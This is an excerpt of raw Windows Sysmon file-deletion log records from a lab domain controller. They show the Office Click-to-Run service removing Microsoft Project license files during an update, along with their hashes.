23542300x800000000000000067611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_Trial-pl.xrm-msMD5=E06B60CB58CBA6B9F4403165D148A576,SHA256=A16B2E2061A8957458718115798698F48DB00DB93F111680FDBCB19293AD474F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_Retail2-ul-phn.xrm-msMD5=E046C9A124E0A9D2A9AF66262BCF28F3,SHA256=EDEA618013E6BA2A2695923B7AC3D79CCD75C2C9FCD0E4A2B4BF3DD8E84F0F95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_Retail2-ul-oob.xrm-msMD5=F8E710E89C7E99093B2A6F784FEAA884,SHA256=2B57CA59CFCF61275315DF36A951471389FCB29D2BA048862F4C7AD32D7F31BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_Retail2-ppd.xrm-msMD5=C9043AC83192ED089CC801CF0722D9D0,SHA256=FB1854F19E139B6DE35E4A52DBCC9A75006D2A905364A23F1D66A5E24EF2A5DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_Retail2-pl.xrm-msMD5=737D0D481F60D489A76B69C84EF79FA2,SHA256=5B022E3B9D32A91A25584AE51EEEEEC3F5E08D8E327B65651384171292BF50DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_Retail-ul-phn.xrm-msMD5=DDBE83C6D2EAEE774F88C610875133BA,SHA256=5AE35C04140155C36064D2B6554395EEC4EA20D0E1A843EB953568B626AF3E4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_Retail-ul-oob.xrm-msMD5=21FF1AA2C3BBF66E7C8962766ED389AD,SHA256=416EB83DFEA68C74B595BD3C7CC19311B80D55E5242DE1FFB82348F3231FAA50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_Retail-ppd.xrm-msMD5=DF8B50D3C63663953F96CD7AC8407CB8,SHA256=932FBEB8182B84AE67A68C0E2666F4F0C6E99D32F0CA9DA8574A30ECF76A10D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_Retail-pl.xrm-msMD5=937CBC763061327253928ACD403A7340,SHA256=66F8E02956CACAF04990C8A1B4B5148EDF3084BFA72672981AFA50328012E836,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_OEM_Perp-ul-phn.xrm-msMD5=43054D382B1B66CAD95371F1A875976A,SHA256=9FD089F0FE780D7D84934AFCBFDC0C30C129FF2B7B59B5C7242565E3B2941C4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_OEM_Perp-ul-oob.xrm-msMD5=A4FCDF99F48DECE7FA717E1777514DB2,SHA256=7930C94DA63C86B5D04B5BCA33DD90BF7ED5CFFF2AFADD4ADAB8D2DE89A26703,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_OEM_Perp-ppd.xrm-msMD5=DA6259580D2F45109D5D8E2C7C8A02E1,SHA256=5F5DDB8583C5DB80669185D4F2C5A56642FAF6C88290EDF291C39E6D1620A6DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_OEM_Perp-pl.xrm-msMD5=0750EEC9FC4E4B584F797C70B8427304,SHA256=DC34B8BF01BE1CA41CBA6707AA2381B9A5F7ED54512051110AD68D59E48999F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_Grace-ul-oob.xrm-msMD5=264DB8FFBF70142EA2A82741574E46EB,SHA256=77E1A9DDEBA6E7AB8D8552AAFD1B254D8F9118557BCFEF7A7B14048D2BF63951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_Grace-ppd.xrm-msMD5=9C5B11F5D0178D63FF4C95383DA6DF52,SHA256=6CD40145D928BFE61BE4B8E12CB6EF3C1D57912F35F83DCC1F660062BEE5306C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProO365R_SubTrial-ul-oob.xrm-msMD5=B1A83C93469D8CC3B1C5A895E8ED434A,SHA256=6D929CA3DFF966061B0980F55BE732C01478F6A5F1627D4BA954C031EA42ABEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProO365R_SubTrial-ppd.xrm-msMD5=2DD20130F177FA62504B25777405AE97,SHA256=9395B86C7F13D39B14FFC0BA7E93E4A3E0C31A6B3FF4B01A52C8CB97877F10A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProO365R_SubTrial-pl.xrm-msMD5=7F7D34F9FD5D4044B0FA4E4829D46CC4,SHA256=2F8ED7DA87FC7F9FFF658523AD179244B6342A3059E7A45E4395ACAF152B05B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProO365R_SubTest-ul-oob.xrm-msMD5=E0222C327DB1813490228BC2C4077772,SHA256=892F62F9BB5DE4171AE1C48823730F432DB1D58B83E9C15905A82DC4763B75D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProO365R_SubTest-ppd.xrm-msMD5=1DDABFF2B116EE02EC061AA4CA552691,SHA256=F46D0A7ECB999E7576304C44F3C153F714C305296D326008AAA893A6D49B76C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProO365R_SubTest-pl.xrm-msMD5=DBF6842B41A5FDB6DD0E6DF030C7B641,SHA256=59211D6351E26087E68554741434699DBF9AD05A7E1118CEE18D0119871A38DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProO365R_Subscription-ul-oob.xrm-msMD5=A8A7A73920E63DD64EDC769DB6A193B7,SHA256=46CF206A6BAEFB4F2E0F35658386E2C693C447F7A48D2F45FD9FDD151FEDF42B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProO365R_Subscription-ppd.xrm-msMD5=35F813BFDCB0ACF56D341E30FA40DDBB,SHA256=C940D80E078279EF488B20548ACDF504BFA00B64286B336A93485F28DB4F0FD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProO365R_Subscription-pl.xrm-msMD5=55F24F49CE32F33EAC568A6C974437E6,SHA256=47121CA4303452C1B8C7B22A7AD518A06E81E7746F9AA1521057792EEBC9989E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProMSDNR_Retail-ul-phn.xrm-msMD5=96EB49228F53CE9C0FEEE0A9121580A0,SHA256=75C1E6D69378801C302AC4BA80ABCA9C70A8D30BE672BC12B569FE247FB4C9AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProMSDNR_Retail-ul-oob.xrm-msMD5=40C6394C1832FC252437C0B20499E0AA,SHA256=E6E6B2388BE515631920037FFE91E3D0B6C33E926C37ED325C167BACFC2FD054,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProMSDNR_Retail-ppd.xrm-msMD5=F3C8412497A3F705F0D5442BE6BB8A48,SHA256=B7F80AADE81D7F613E19214F11C92D26C83BEA35DBBC123DEEF275331D44201C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProMSDNR_Retail-pl.xrm-msMD5=B6FAEA1179EFAC80BD178A9AC634A958,SHA256=206CF3C55FB8FC9587E7F29FD6763E94A5907E4DABADA94E6459D98A2FF19C40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProDemoR_BypassTrial180-ul-oob.xrm-msMD5=135C8A66C9B07141AD07AEF0784559A4,SHA256=3FBC1C565E8F21D33B88CDA7DE1F6823A557FA1C72E4729203AF5792D77DCB17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProDemoR_BypassTrial180-ppd.xrm-msMD5=9DF39EF81997B4EE81F6705AC1404D5F,SHA256=8513034034036461B9B42D39080482B45EF16E3031EFAAFBFC088F3E827156C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProCO365R_SubTrial-ul-oob.xrm-msMD5=0A73459699FEFCF2BDE556C1756FB9E0,SHA256=F48563332C35D2F2165F07365A0ABB1B1E18C10053171111E024C44445634105,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProCO365R_SubTrial-ppd.xrm-msMD5=C5B32EA3FA4513917DC8990C71693386,SHA256=B798F45DF058EDEA781D2A0FB3AD59924427C5E00E19FDD531110B03FC857293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProCO365R_SubTrial-pl.xrm-msMD5=DFBB1973FE1B1D968BB8E94A247FE782,SHA256=28B2C592E470A2164C3FFCAE3706C4EDE6BEE242D4852CCC239876C297E9C212,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProCO365R_SubTest-ul-oob.xrm-msMD5=5104B22503AAEBB232126B8677012CA4,SHA256=77224408BA725BEE7145837C35A756A2CEC31F26E75A26B948D3ACF342160AF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProCO365R_SubTest-ppd.xrm-msMD5=BE5C601060C7807A6F1FBF3CE695765E,SHA256=9CB4DD9AAE58F67357DE0AB587FED52D6E1FFD0DC169AEC904BEF1572CC45151,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProCO365R_SubTest-pl.xrm-msMD5=FFD7C21F116A2B9A271DF822A9E94771,SHA256=6E7B80F444B4315A7B1D89925E6A462A71DB6C97DBF2B6234F858060B39C0837,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProCO365R_Subscription-ul-oob.xrm-msMD5=102CAE8C6561C0F8CEE9B87542621F44,SHA256=D1D13FC1A083E46E7C2B892C0D502802A280A8202FB3931CFD701F4DBD0C81CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProCO365R_Subscription-ppd.xrm-msMD5=7CBADD5E49A6849799099D3A3D4DE95A,SHA256=FBA5983F025682F13901E25ABAC1FCA226B781E57FE53F41FA5EF53870C7B65A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProCO365R_Subscription-pl.xrm-msMD5=1B1D08E9DFECDC0162A83CC758A2F5A9,SHA256=41E61DF66FCF4DFCDD676D415E78E3E3CABF0D23970CBA8281F56067FF061976,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-ul-phn.xrm-msMD5=F98E2DB7A8F8AF38B9C18DB82AB9F575,SHA256=AF4413D293F4DD55CC54F575527CA0A21BDEBE7CB5EF0FBD4F5BB2CCF89B97EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-ul-oob.xrm-msMD5=4512C94CC6D3E3E4104EF594930B91C8,SHA256=2808FB86D7A4DEAC54A0767A6D198C81D34A34D8820EC2DDA187D76EBAB85FB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-ppd.xrm-msMD5=E26D48BFF1062EBE89F7350F0243EA45,SHA256=7976820E36A326B40DB2A25F32C831C491FD14B62A1A6C5385893B1D4E55B320,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-pl.xrm-msMD5=FCA67A6934383884FCAD5D92C0FBA7CB,SHA256=D426084396910B7086E28D01DD5DC65BAE02707C5C0A821BCCDDC094BACC58D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 